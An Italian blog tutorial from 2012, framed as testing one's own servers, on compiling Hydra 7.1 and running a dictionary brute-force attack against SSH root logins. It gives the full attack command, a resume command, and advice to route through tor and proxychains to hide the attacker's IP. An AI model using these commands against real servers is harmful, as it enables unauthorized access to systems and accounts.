Hydra: testare la vulnerabilità agli attacchi bruteforce dei nostri server

Creato il 06 gennaio 2012 da Nightfly

Premessa

Questo post ha come unico scopo quello di illustrare come testare la vulnerabilità dei nostri server nei confronti degli attacchi bruteforce (nella fattispecie diretti contro il servizio SSH). Pertanto, il sottoscritto non si assume alcuna responsabilità riguardo all'uso inappropriato delle informazioni qui riportate.

Download ed installazione di Hydra 7.1

Per prima cosa occorre scaricare i sorgenti di Hydra 7.1. Potete effettuare tale operazione direttamente da CLI, digitando il comando:

nightfly@nightbox:~$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz

Scompattiamo la tarball:

nightfly@nightbox:~$  tar -xzvf hydra-7.1-src.tar.gz

e posizioniamoci nella directory hydra-7.1-src appena creata:

nightfly@nightbox:~$ cd hydra-7.1-src/

A questo punto possiamo procedere con l'installazione del software in questione. Prima di fare ciò, però, occorre scaricare alcuni pacchetti necessari per soddisfare le dipendenze in fase di compilazione:

nightfly@nightbox:~/hydra-7.1-src$ sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev

Ad installazione completata lanciamo un ./configure, seguito da un make ed un make install:

nightfly@nightbox:~/hydra-7.1-src$ ./configure

nightfly@nightbox:~/hydra-7.1-src$ make

nightfly@nightbox:~/hydra-7.1-src$ make install

Prima di utilizzare Hydra dobbiamo installare un dizionario dal quale prelevare le password da usare durante i nostri attacchi:

nightfly@nightbox:~/hydra-7.1-src$ sudo apt-get install wamerican-huge

Esecuzione dell'attacco

Adesso siamo pronti a scagliare l'attacco vero e proprio:

nightfly@nightbox:~/hydra-7.1-src$ proxychains hydra -l root -P /usr/share/dict/american-english-huge <ip del server> ssh

Ovviamente affinchè tale attacco possa proseguire senza intoppi è necessario che:

1) sul server target non sia presente alcun meccanismo che limiti il rate dei tentativi di login (ad esempio fail2ban);

2) sul server target deve essere abilitato l'accesso via SSH per l'utente root;

3) sulla macchina dell'attaccante deve essere presente sia tor che proxychains, in modo da non rivelare il proprio indirizzo IP.

Adesso non vi resta che attendere l'esito del test.

A presto.

PS: se per qualche motivo dovete interropere un attacco, potete effettuare un resume dello stesso (in un secondo momento), semplicemente digitando il comando:

nightfly@nightbox:~/hydra-7.1-src$ proxychains hydra-R